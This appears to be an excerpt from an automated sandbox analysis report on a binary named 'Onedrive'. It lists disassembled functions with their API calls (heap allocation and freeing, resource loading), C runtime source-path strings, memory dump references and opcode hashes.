                                                    • Opcode ID: 884c5efd9a5742059d0b79e7ed1e330083409f75ff9e6496b94d5f74a7548500
                                                    • Instruction ID: ecdd901d2b539c811381b6452550d44a5b6f035f7f94e73068590871001ac3d3
                                                    • Opcode Fuzzy Hash: 884c5efd9a5742059d0b79e7ed1e330083409f75ff9e6496b94d5f74a7548500
                                                    • Instruction Fuzzy Hash: 77116032B18A8186DB60DB21E4657AF77A0FB84384F411135F6DE5AAADDF3CD1448F40
                                                    Function 00007FFDF3AD4210 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    Strings
                                                    • D:\a\_work\1\s\src\vctools\crt\vcruntime\src\internal\per_thread_data.cpp, xrefs: 00007FFDF3AD42C7
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: D:\a\_work\1\s\src\vctools\crt\vcruntime\src\internal\per_thread_data.cpp
                                                    • API String ID: 0-277556848
                                                    • Opcode ID: cb6ecb3aaef34b468bae1170072a2830f2fb51ed3aefea9556cec36e5ef26729
                                                    • Instruction ID: 4fa1b89bf4f50d954535e29cb820ad413c2038f6723c86397eaeaad90bae83fe
                                                    • Opcode Fuzzy Hash: cb6ecb3aaef34b468bae1170072a2830f2fb51ed3aefea9556cec36e5ef26729
                                                    • Instruction Fuzzy Hash: 10411F21B2CA4281E750E716E471BBAB361FF90754F811231F6BE5AAEEDF2CE5048740
                                                    Function 00007FFDF3ADAC30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    Strings
                                                    • minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h, xrefs: 00007FFDF3ADACE4
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
                                                    • API String ID: 0-3378279506
                                                    • Opcode ID: 6d7ec9261b6e7ff48fb581261d091401e4b3bd5866dffb7fb484ad0837b6df4c
                                                    • Instruction ID: 9893f03fd3b41f55f9d4f2ae8873e5e90e417ca52570dac9745992b71952abd4
                                                    • Opcode Fuzzy Hash: 6d7ec9261b6e7ff48fb581261d091401e4b3bd5866dffb7fb484ad0837b6df4c
                                                    • Instruction Fuzzy Hash: B7316F21A1CB8581DB609B16E06076EB7A0FB847A4F450232F6FE5A7DEDF2CD5018B40
                                                    Function 00007FFDF3ADAAF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    Strings
                                                    • minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h, xrefs: 00007FFDF3ADABA1
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
                                                    • API String ID: 0-3378279506
                                                    • Opcode ID: 2b22b30b438b324ff4d40baa6bb5dc005a0da452e6cb4f6b3b9614bae950eae4
                                                    • Instruction ID: 5cb16073718d9cfd03a8d5deda593427fcea470e81d014be8000c7587cfbe0a2
                                                    • Opcode Fuzzy Hash: 2b22b30b438b324ff4d40baa6bb5dc005a0da452e6cb4f6b3b9614bae950eae4
                                                    • Instruction Fuzzy Hash: 51317E21A1CB8181EB20AB16E06076EB7A1FB857A4F511631F6FE6B7D9DF2CD5018B40
                                                    Function 00007FFDF3AD8480 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFileHeaderRaise
                                                    • String ID: csm
                                                    • API String ID: 2573137834-1018135373
                                                    • Opcode ID: 3dce9d5ffc41d897f93aecee3ad84683867be43052ef9da2edad16db5feba034
                                                    • Instruction ID: da044472d22c8fe12ce97d13169ea5160cb60b911c2c4883342080e2d2b7925f
                                                    • Opcode Fuzzy Hash: 3dce9d5ffc41d897f93aecee3ad84683867be43052ef9da2edad16db5feba034
                                                    • Instruction Fuzzy Hash: C431D036619F8886DBA0CB1AF49071AB7A4F388B94F500225EBDD47BA8DF3CC554CB00
                                                    Function 00007FFDF3AE9160 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    Strings
                                                    • minkernel\crts\ucrt\src\appcrt\startup\argv_parsing.cpp, xrefs: 00007FFDF3AE9202
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: minkernel\crts\ucrt\src\appcrt\startup\argv_parsing.cpp
                                                    • API String ID: 0-2685728405
                                                    • Opcode ID: f0b89c81be12142a5036038e0274ffe8156e1e0663c88568edabf4c66ad31f58
                                                    • Instruction ID: a8387b97f33e58f176f6a3b800b07c4f46bd200d0e1a2ec4f2a7d7c20e6f7a5f
                                                    • Opcode Fuzzy Hash: f0b89c81be12142a5036038e0274ffe8156e1e0663c88568edabf4c66ad31f58
                                                    • Instruction Fuzzy Hash: C4212D2272CA8181DB50DB16F45066AB3A4FB847A0F500335F6BE5ABEDDF3CD1508B00
                                                    Function 00007FF63EA118A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: CharCompareNextString
                                                    • String ID: ParentWindowHandle
                                                    • API String ID: 42738925-3107191162
                                                    • Opcode ID: 9b5e5f58ba1c0355205f2e51d40cdeab6236930dcbe1988ed698acfeb2a85902
                                                    • Instruction ID: ec9bf9df7c1f352e251f8ad9a2377efa543a2ffec62dcd9414e543d60a5cd6a1
                                                    • Opcode Fuzzy Hash: 9b5e5f58ba1c0355205f2e51d40cdeab6236930dcbe1988ed698acfeb2a85902
                                                    • Instruction Fuzzy Hash: 0811D232B08B5182E6109B56E440069BBA4FBB4BE0F494231EAAD873A0CF3CE446C750
                                                    Function 00007FFDF3B0E410 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: _handle_error
                                                    • String ID: !
                                                    • API String ID: 1757819995-2657877971
                                                    • Opcode ID: 31259513605473294c34c3e7b0e08d07127f97ca892bbed1284fd23ba27d28bd
                                                    • Instruction ID: 6b1900b39d72cd2c5fcb8bdc536d166cffb6e0d850e6859fadf9cd0419a2afbf
                                                    • Opcode Fuzzy Hash: 31259513605473294c34c3e7b0e08d07127f97ca892bbed1284fd23ba27d28bd
                                                    • Instruction Fuzzy Hash: 1F212876A18BC586D360CF20E46475BB760FBDA394F505316E6C92AA59EFBCD0848F00
                                                    Function 00007FF63EA1C094 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00007FF63EA1BF50: FindResourceExW.KERNEL32(?,?,?,00007FF63EA1C0CB,?,?,00000000,00000000,ComplianceText,00007FF63EA1671B), ref: 00007FF63EA1BF89
                                                      • Part of subcall function 00007FF63EA1BF50: LoadResource.KERNEL32(?,?,?,00007FF63EA1C0CB,?,?,00000000,00000000,ComplianceText,00007FF63EA1671B), ref: 00007FF63EA1BFA6
                                                      • Part of subcall function 00007FF63EA1BF50: LockResource.KERNEL32(?,?,?,00007FF63EA1C0CB,?,?,00000000,00000000,ComplianceText,00007FF63EA1671B), ref: 00007FF63EA1BFBA
                                                    • CoTaskMemAlloc.API-MS-WIN-CORE-COM-L1-1-0(?,?,00000000,00000000,ComplianceText,00007FF63EA1671B), ref: 00007FF63EA1C0DE
                                                    • memmove.MSVCRT(?,?,00000000,00000000,ComplianceText,00007FF63EA1671B), ref: 00007FF63EA1C0FF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Resource$AllocFindLoadLockTaskmemmove
                                                    • String ID: ComplianceText
                                                    • API String ID: 2400272053-346262819
                                                    • Opcode ID: d0e0c6b74d3b1db5bed1160ee6f8d77aa5f369837bbad029478e9a13ddd59461
                                                    • Instruction ID: 4c5d82669d99c2e76f35e3c1533412bd1c17a158e45d6965879311054c992e62
                                                    • Opcode Fuzzy Hash: d0e0c6b74d3b1db5bed1160ee6f8d77aa5f369837bbad029478e9a13ddd59461
                                                    • Instruction Fuzzy Hash: 9301AD32704B4AC6E7008F52E4454AAB7A4FB68BD0B564135EF9C83311EF79D85AD740
                                                    Function 00007FFDF3AECC00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • __vcrt_lock.LIBVCRUNTIMED ref: 00007FFDF3AECC0B
                                                      • Part of subcall function 00007FFDF3AF6620: EnterCriticalSection.KERNEL32(?,?,?,?,00007FFDF3AE8375,?,?,?,?,00007FFDF3AE8062), ref: 00007FFDF3AF6641
                                                      • Part of subcall function 00007FFDF3AEA8F0: _CrtIsValidPointer.LIBCMTD ref: 00007FFDF3AEAA28
                                                    • __vcrt_lock.LIBVCRUNTIMED ref: 00007FFDF3AECC1E
                                                      • Part of subcall function 00007FFDF3AF66B0: LeaveCriticalSection.KERNEL32 ref: 00007FFDF3AF66D1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection__vcrt_lock$EnterLeavePointerValid
                                                    • String ID: Object dump complete.
                                                    • API String ID: 214106405-632625063
                                                    • Opcode ID: 4cfabe9e16e217f67a37880c542c18e4384e5ef92c90be165fa344c828315f3d
                                                    • Instruction ID: 8fdbbeaf2102e6cb8f448b5b1ef0ec981d68df511f2b33fbdca2f34d68b5d027
                                                    • Opcode Fuzzy Hash: 4cfabe9e16e217f67a37880c542c18e4384e5ef92c90be165fa344c828315f3d
                                                    • Instruction Fuzzy Hash: A2E0E531F1874241EB28BB72E472C6A3799AB80300F915435EA9D56AEEDE3DD4508700
                                                    Function 00007FF63EA15CEC Relevance: 5.1, APIs: 4, Instructions: 119memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Heap$Process$AllocFree
                                                    • String ID:
                                                    • API String ID: 756756679-0
                                                    • Opcode ID: ec3ed53e830ef29eaed5c7455dc5402a09fcb77eb0c15c34ebd509174ddb0a9b
                                                    • Instruction ID: 2e66a8af4e8a437504550666042716cfb12a5b8269659c3873eb93d3fbccd256
                                                    • Opcode Fuzzy Hash: ec3ed53e830ef29eaed5c7455dc5402a09fcb77eb0c15c34ebd509174ddb0a9b
                                                    • Instruction Fuzzy Hash: A241E632F0865686EE14AF92544807DB692BFB4BC0B5A4438FE4E97791DF3CE40DA360
                                                    Function 00007FF63EA1566C Relevance: 5.1, APIs: 4, Instructions: 106memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Heap$Process$AllocFree
                                                    • String ID:
                                                    • API String ID: 756756679-0
                                                    • Opcode ID: a3998bc3de551fcda7df379af246413ff6d61123959c3ffa7706a279462b92c5
                                                    • Instruction ID: 9a0f812b5855a26db8e29e89e1003412c52cb3a691ae0747412af8178f1bcb13
                                                    • Opcode Fuzzy Hash: a3998bc3de551fcda7df379af246413ff6d61123959c3ffa7706a279462b92c5
                                                    • Instruction Fuzzy Hash: 8731F222B08B4687EA14BF91A44407DB692BFB8BD4F194434FA5E87391EF3CE44DA650
                                                    Function 00007FF63EA13CD4 Relevance: 5.1, APIs: 4, Instructions: 61memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(?,0000002C,00000000,00007FF63EA1D792,?,?,?,00000000,?,?,?,00007FF63EA1D0EA,?,?,00000000), ref: 00007FF63EA13D22
                                                    • HeapFree.KERNEL32(?,?,?,00000000,?,?,?,00007FF63EA1D0EA,?,?,00000000), ref: 00007FF63EA13D36
                                                    • GetProcessHeap.KERNEL32(?,0000002C,00000000,00007FF63EA1D792,?,?,?,00000000,?,?,?,00007FF63EA1D0EA,?,?,00000000), ref: 00007FF63EA13D60
                                                    • HeapFree.KERNEL32(?,?,?,00000000,?,?,?,00007FF63EA1D0EA,?,?,00000000), ref: 00007FF63EA13D74
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Heap$FreeProcess
                                                    • String ID:
                                                    • API String ID: 3859560861-0
                                                    • Opcode ID: 638836722cf7048d1bf94783388415340188a83ebd2bdcbcea777a97fdbb2424
                                                    • Instruction ID: 77c9c5dc45931c951e120fee972c9c1d53ae7dd88bdce3414ba9de27ec8ba080
                                                    • Opcode Fuzzy Hash: 638836722cf7048d1bf94783388415340188a83ebd2bdcbcea777a97fdbb2424
                                                    • Instruction Fuzzy Hash: 9C211572605B80DAD704DF56E980129FBA0FB59F94B59C068EE4D93724CF38E8AAC700
                                                    Function 00007FF63EA193FC Relevance: 5.0, APIs: 4, Instructions: 41memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(?,?,?,00007FF63EA18E62,?,?,00000000,00007FF63EA18CA3), ref: 00007FF63EA19425
                                                    • HeapFree.KERNEL32(?,?,?,00007FF63EA18E62,?,?,00000000,00007FF63EA18CA3), ref: 00007FF63EA19439
                                                    • GetProcessHeap.KERNEL32(?,?,?,00007FF63EA18E62,?,?,00000000,00007FF63EA18CA3), ref: 00007FF63EA19460
                                                    • HeapFree.KERNEL32(?,?,?,00007FF63EA18E62,?,?,00000000,00007FF63EA18CA3), ref: 00007FF63EA19474
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Heap$FreeProcess
                                                    • String ID:
                                                    • API String ID: 3859560861-0
                                                    • Opcode ID: 3e86e4dcd2535bc755a9fed3a9300e9a714d08f464ff0702280dd5afbf24254d
                                                    • Instruction ID: 0a1fb919e2de2f0e704fa0258ca117a499025773872454f3144ec716d47ed561
                                                    • Opcode Fuzzy Hash: 3e86e4dcd2535bc755a9fed3a9300e9a714d08f464ff0702280dd5afbf24254d
                                                    • Instruction Fuzzy Hash: E4113C32A05A81C6E7019FA2E540339BBA0FBA9F85F09C178DA0E57758CF38D44AD750
                                                    Function 00007FF63EA11D30 Relevance: 5.0, APIs: 4, Instructions: 39memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Heap$FreeProcess
                                                    • String ID:
                                                    • API String ID: 3859560861-0
                                                    • Opcode ID: 370ec17ccc83911cd007076dc0f9eb91e4386e1627f728e9e5818a12ee81812d
                                                    • Instruction ID: 2493acac8ffd9a9bfbbc56072b7a6baf202e9766cb7055b224edb8ffc8937dbc
                                                    • Opcode Fuzzy Hash: 370ec17ccc83911cd007076dc0f9eb91e4386e1627f728e9e5818a12ee81812d
                                                    • Instruction Fuzzy Hash: 02014032A08B41CAE704AF56B4443A9BBA0FBA9B80F4D8174EE4D53719DF3CD459D750
                                                    Function 00007FF63EA1E210 Relevance: 5.0, APIs: 4, Instructions: 34memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(?,?,?,00007FF63EA1DE5C,?,?,00000000,00007FF63EA1C831), ref: 00007FF63EA1E226
                                                    • HeapFree.KERNEL32(?,?,?,00007FF63EA1DE5C,?,?,00000000,00007FF63EA1C831), ref: 00007FF63EA1E23B
                                                    • GetProcessHeap.KERNEL32(?,?,?,00007FF63EA1DE5C,?,?,00000000,00007FF63EA1C831), ref: 00007FF63EA1E25B
                                                    • HeapFree.KERNEL32(?,?,?,00007FF63EA1DE5C,?,?,00000000,00007FF63EA1C831), ref: 00007FF63EA1E270
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Heap$FreeProcess
                                                    • String ID:
                                                    • API String ID: 3859560861-0
                                                    • Opcode ID: 938d2cf42dbc51606c7f29f4e85f8ebc757b3eddb55ba9efdae9b313ca5ec6b8
                                                    • Instruction ID: 1e433069d0e2ef8a44c0c4bcd9ce898d6824c9c3f011ce44fb6603f5662b5159
                                                    • Opcode Fuzzy Hash: 938d2cf42dbc51606c7f29f4e85f8ebc757b3eddb55ba9efdae9b313ca5ec6b8
                                                    • Instruction Fuzzy Hash: 79012C32A04A82C6EB049B62E1583B9ABE0FF7DB89F4DC075DB0A86345DF38D0599310